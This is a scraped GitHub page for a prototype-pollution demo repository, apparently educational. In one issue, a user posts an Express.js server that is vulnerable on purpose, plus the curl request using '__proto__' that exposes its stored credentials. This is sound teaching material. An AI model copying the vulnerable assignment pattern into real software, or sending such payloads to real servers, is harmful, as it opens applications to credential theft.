pwnfunction / next.js-flat-prototype-pollution Goto Github PK
View Code? Open in Web Editor NEWPrototype Pollution using `flat` with Next.js
next.js-flat-prototype-pollution's People
Contributors
Stargazers
Watchers
Forkers
minecodes bbhunter arijitdirghanji apeezy9102 lewisblackburn gamemaker2k tonyrex99 mackenia kaiili excloudx6 thangphan-kmsnext.js-flat-prototype-pollution's Issues
Idea: Add small & simple exploitable server
Hi! Just watched your video (great video by the way!), and I have a small suggestion: The exploit shown in the video is IMO a bit complicated, and using a 3rd party library with the bug in it. So I wrote a small Express.js web server for Node that's vulnerable to the same concept, but simpler. This is the code:
let app = require("express")() // Load & create an Express server
let userData = {} // User data storage object
let credentials = {email: "[email protected]", password: "abcd"}
app.get("/addUser", (req, res) => {
let {region, name, uuid} = req.query // Store query parameters into variables
if (userData[region] === undefined) { // If that region isn't initialized:
userData[region] = {} // Make it an empty object
}
userData[region][name] = uuid // Store the UUID under the name in the region
res.send("Success!\n") // And send a success message.
})
app.get("/debug/getCurrentCredentials", (req, res) => {
if (process.env.TESTING === "true") { // If the testing env variable is set:
res.send(JSON.stringify(credentials) + "\n") // Send the credentials
} else { // Or:
res.status(403).send("Not allowed!\n") // Send an error
}
})
app.listen(1337) // And run the serverIt has essentially the same vulnerability, we can exploit it by sending this request:
❯ node server.js &
❯ curl "localhost:1337/debug/getCurrentCredentials"
Not allowed!
❯ curl "localhost:1337/addUser?region=__proto__&name=TESTING&uuid=true"
Success!
❯ curl "localhost:1337/debug/getCurrentCredentials"
{"email":"[email protected]","password":"abcd"}It's super simple, the server executes userData["__proto__"]["TESTING"] = "true" in line 9, so the server thinks the TESTING env variable is set to "true". And we don't even have to involve a fancy JSON parser or anything, just the assignation is enough. Might be a nice little addition :)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.